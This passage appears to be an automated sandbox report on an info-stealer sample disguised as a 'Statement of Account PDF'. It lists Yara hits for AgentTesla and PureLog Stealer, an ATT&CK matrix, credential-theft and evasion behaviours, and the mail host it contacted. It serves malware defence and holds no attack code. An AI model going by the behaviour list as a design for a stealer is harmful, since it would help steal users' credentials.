                      Source: Yara matchFile source: 0000000F.00000002.4080192144.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.1916411729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.1856813364.0000000004928000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.1945703172.0000000004798000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4080192144.00000000030CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.1928490064.000000000356C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.1928490064.0000000003541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4082420582.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.1928490064.0000000003574000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1700653245.0000000004337000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Statement of Account PDF.bat.exe PID: 6984, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Statement of Account PDF.bat.exe PID: 7252, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: gDdsxauPhk.exe PID: 7720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 8032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7220, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7400, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: BjTxJte.exe PID: 7752, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.7600000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.3949970.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.3949970.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Statement of Account PDF.bat.exe.7600000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1700653245.0000000003949000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1710196910.0000000007600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		2
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		112
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		21
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		2
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		1
                      Query Registry                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Registry Run Keys / Startup Folder                      		22
                      Software Packing                      		NTDS221
                      Security Software Discovery                      		Distributed Component Object Model21
                      Input Capture                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Timestomp                      		LSA Secrets2
                      Process Discovery                      		SSH1
                      Clipboard Data                      		23
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain Credentials151
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                      Virtualization/Sandbox Evasion                      		Proc Filesystem1
                      System Network Configuration Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                      Process Injection                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Hidden Files and Directories                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432040 Sample: Statement of Account PDF.bat.exe Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 61 mail.fascia-arch.com 2->61 63 api.ipify.org 2->63 69 Found malware configuration 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 Sigma detected: Scheduled temp file as task from temp location 2->73 75 12 other signatures 2->75 8 Statement of Account PDF.bat.exe 7 2->8         started        12 gDdsxauPhk.exe 2->12         started        14 BjTxJte.exe 2->14         started        16 BjTxJte.exe 2->16         started        signatures3 process4 file5 57 C:\Users\user\AppData\...\gDdsxauPhk.exe, PE32 8->57 dropped 59 C:\Users\user\AppData\Local\Temp\tmp690.tmp, XML 8->59 dropped 91 Adds a directory exclusion to Windows Defender 8->91 93 Injects a PE file into a foreign processes 8->93 18 Statement of Account PDF.bat.exe 16 5 8->18         started        23 powershell.exe 23 8->23         started        31 2 other processes 8->31 95 Multi AV Scanner detection for dropped file 12->95 97 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->97 99 Machine Learning detection for dropped file 12->99 25 gDdsxauPhk.exe 12->25         started        33 3 other processes 12->33 27 BjTxJte.exe 14->27         started        35 2 other processes 14->35 29 BjTxJte.exe 16->29         started        37 2 other processes 16->37 signatures6 process7 dnsIp8 65 mail.fascia-arch.com 50.87.195.61, 49736, 49739, 49753 UNIFIEDLAYER-AS-1US United States 18->65 67 api.ipify.org 104.26.12.205, 443, 49734, 49737 CLOUDFLARENETUS United States 18->67 53 C:\Users\user\AppData\Roaming\...\BjTxJte.exe, PE32 18->53 dropped 55 C:\Users\user\...\BjTxJte.exe:Zone.Identifier, ASCII 18->55 dropped 77 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->77 79 Tries to steal Mail credentials (via file / registry access) 18->79 81 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->81 83 Loading BitLocker PowerShell Module 23->83 39 conhost.exe 23->39         started        41 WmiPrvSE.exe 23->41         started        85 Tries to harvest and steal ftp login credentials 29->85 87 Tries to harvest and steal browser information (history, passwords, etc) 29->87 89 Installs a global keyboard hook 29->89 43 conhost.exe 31->43         started        45 conhost.exe 31->45         started        47 conhost.exe 33->47         started        49 conhost.exe 35->49         started        51 conhost.exe 37->51         started        file9 signatures10 process11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Statement of Account PDF.bat.exe47%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      Statement of Account PDF.bat.exe57%VirustotalBrowse
                      Statement of Account PDF.bat.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\gDdsxauPhk.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe47%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe57%VirustotalBrowse
                      C:\Users\user\AppData\Roaming\gDdsxauPhk.exe47%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Roaming\gDdsxauPhk.exe57%VirustotalBrowse

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      mail.fascia-arch.com0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://r3.i.lencr.org/00%URL Reputationsafe
                      http://r3.i.lencr.org/00%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://x1.c.lencr.org/00%URL Reputationsafe
                      http://x1.i.lencr.org/00%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
                      http://mail.fascia-arch.com0%Avira URL Cloudsafe
                      http://www.ascendercorp.com/typedesigners.htmlqX0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn0%Avira URL Cloudsafe
                      http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
                      http://www.zhongyicts.com.cn1%VirustotalBrowse
                      http://mail.fascia-arch.com0%VirustotalBrowse
                      http://www.founder.com.cn/cn/cThe0%VirustotalBrowse
                      http://www.founder.com.cn/cn0%VirustotalBrowse

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.ipify.org
                      		104.26.12.205
                      		truefalse
                        		high
                        mail.fascia-arch.com
                        		50.87.195.61
                        		truetrueunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.apache.org/licenses/LICENSE-2.0Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.ascendercorp.com/typedesigners.htmlqXStatement of Account PDF.bat.exe, 00000000.00000002.1707110996.0000000005BF7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.fontbureau.comStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersGStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/?Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bTheStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://account.dyn.com/Statement of Account PDF.bat.exe, 00000000.00000002.1700653245.0000000004337000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000012.00000002.1856813364.0000000004928000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1916411729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.1945703172.0000000004798000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designers?Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.tiro.comStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designersStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.goodfont.co.krStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://api.ipify.org/tgDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003031000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1928490064.00000000034F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.carterandcone.comlStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://r3.i.lencr.org/0Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006729000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003135000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006707000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4123465356.0000000006762000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4124030684.0000000006777000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4123465356.000000000676E000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000302F000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4151301532.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.000000000673F000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4150449840.0000000007DAB000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4121813503.00000000068ED000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003136000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sajatypeworks.comStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.typography.netDStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/cTheStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://api.ipify.orgStatement of Account PDF.bat.exe, 00000000.00000002.1700653245.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003031000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000012.00000002.1856813364.0000000004928000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1916411729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1928490064.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.1945703172.0000000004798000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.000000000290C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.founder.com.cn/cnStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://mail.fascia-arch.comStatement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003135000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000342C000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003136000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003227000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030CB000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1928490064.000000000356C000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002A42000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002CF8000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002C5F000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002ADB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/frere-user.htmlStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://x1.c.lencr.org/0Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006729000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4151590709.0000000007DE4000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003135000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.0000000001040000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.000000000106A000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4124030684.0000000006777000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4120771933.00000000066C6000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4151301532.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.000000000673F000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4150449840.0000000007DAB000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4121813503.00000000068ED000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003136000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4074399117.000000000148A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://x1.i.lencr.org/0Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006729000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4151590709.0000000007DE4000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003135000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.0000000001040000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.000000000106A000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4124030684.0000000006777000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4120771933.00000000066C6000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4151301532.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.000000000673F000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4150449840.0000000007DAB000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4121813503.00000000068ED000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003136000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4074399117.000000000148A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/Statement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://r3.o.lencr.org0Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006729000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003135000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006707000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4123465356.0000000006762000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4124030684.0000000006777000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4123465356.000000000676E000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000302F000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.000000000673F000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4150449840.0000000007DAB000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4121813503.00000000068ED000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003136000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4074399117.000000000148A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.galapagosdesign.com/DPleaseStatement of Account PDF.bat.exe, 00000000.00000002.1707492672.0000000006D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
